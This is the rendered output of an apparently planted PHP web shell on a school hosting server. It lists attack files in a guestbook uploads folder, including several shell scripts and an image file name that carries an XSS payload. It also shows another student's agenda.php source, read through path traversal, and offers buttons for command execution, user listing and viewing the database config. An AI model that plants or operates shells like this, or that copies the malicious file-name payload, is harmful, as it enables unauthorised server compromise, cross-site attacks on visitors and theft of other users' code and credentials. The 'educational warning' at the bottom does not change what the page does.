🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../583521.klas4s23.mid-ica.nl/public_html/gouden_voetbalschoen/agenda.php

<?php
require_once 'config.php';
include_once 'class/class.php';
session_start();

// Functies voor taakbeheer
functions::taakAanmelden();

// Verkrijg de maand, jaar en weergave (week/maand) van de URL
$current_month = isset($_GET['month']) ? (int) $_GET['month'] : (int) date('m');
$current_year = isset($_GET['year']) ? (int) $_GET['year'] : (int) date('Y');
$view = isset($_GET['view']) ? $_GET['view'] : 'month'; // Default is 'month'

// Bereken de start- en einddatum van de week (zondag tot zaterdag)
$first_day_of_month = "$current_year-$current_month-01";
if ($view === 'week') {
    $week_start_date = isset($_GET['week_start']) ? strtotime($_GET['week_start']) : strtotime("last sunday", strtotime("$current_year-$current_month-01"));
    $week_end_date = isset($_GET['week_end']) ? strtotime($_GET['week_end']) : strtotime("next saturday", $week_start_date);
} else {
    // Maandweergave
    $week_start_date = strtotime("$current_year-$current_month-01"); // Eerste dag van de maand
    $week_end_date = strtotime("last day of this month", $week_start_date); // Laatste dag van de maand
}

// Verwerk navigatieacties
if (isset($_GET['action'])) {
    if ($view === 'week') {
        if ($_GET['action'] === 'week_up') {
            // Volgende week (1 week verder)
            $week_start_date = strtotime("+1 week", $week_start_date);
            $week_end_date = strtotime("+1 week", $week_end_date);
        } elseif ($_GET['action'] === 'week_down') {
            // Vorige week (1 week terug)
            $week_start_date = strtotime("-1 week", $week_start_date);
            $week_end_date = strtotime("-1 week", $week_end_date);
        }
    } elseif ($view === 'month') {
        if ($_GET['action'] === 'month_up') {
            $current_month++;
            if ($current_month > 12) {
                $current_month = 1;
                $current_year++;
            }
        } elseif ($_GET['action'] === 'month_down') {
            $current_month--;
            if ($current_month < 1) {
                $current_month = 12;
                $current_year--;
            }
        } elseif ($_GET['action'] === 'year_up') {
            $current_year++;
        } elseif ($_GET['action'] === 'year_down') {
            $current_year--;
        }
    }

    // Verwerk jaar navigatie
    if ($_GET['action'] === 'year_up') {
        $current_year++;
    } elseif ($_GET['action'] === 'year_down') {
        $current_year--;
    }
}

// Verkrijg de taken voor de maand/week
$start_date = date('Y-m-d', $week_start_date); // Start van de week
$end_date = date('Y-m-d', $week_end_date); // Eind van de week

// Verkrijg de taken voor de maand
$stmt = $pdo->prepare("
    SELECT tasks.*, 
           (SELECT COUNT(*) FROM task_registrations WHERE task_id = tasks.id) AS registrations_count
    FROM tasks
    WHERE date BETWEEN :start_date AND :end_date
");
$stmt->bindParam(':start_date', $start_date); // Bind startdatum
$stmt->bindParam(':end_date', $end_date); // Bind einddatum
$stmt->execute();
$tasks = $stmt->fetchAll(PDO::FETCH_ASSOC);

// Verkrijg de geregistreerde taken van de ingelogde gebruiker
$registered_task_ids = [];
if (isset($_SESSION['user_id'])) {
    $user_id = $_SESSION['user_id'];
    $registration_stmt = $pdo->prepare("SELECT task_id FROM task_registrations WHERE user_id = :user_id");
    $registration_stmt->bindParam(':user_id', $user_id, PDO::PARAM_INT);
    $registration_stmt->execute();
    $registered_task_ids = $registration_stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Functie om taken voor een specifieke dag te verkrijgen
function getTasksForDay($day, $tasks)
{
    $tasks_for_day = [];
    foreach ($tasks as $task) {
        if (date('j', strtotime($task['date'])) == $day) {
            $tasks_for_day[] = $task;
        }
    }
    return $tasks_for_day;
}
?>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!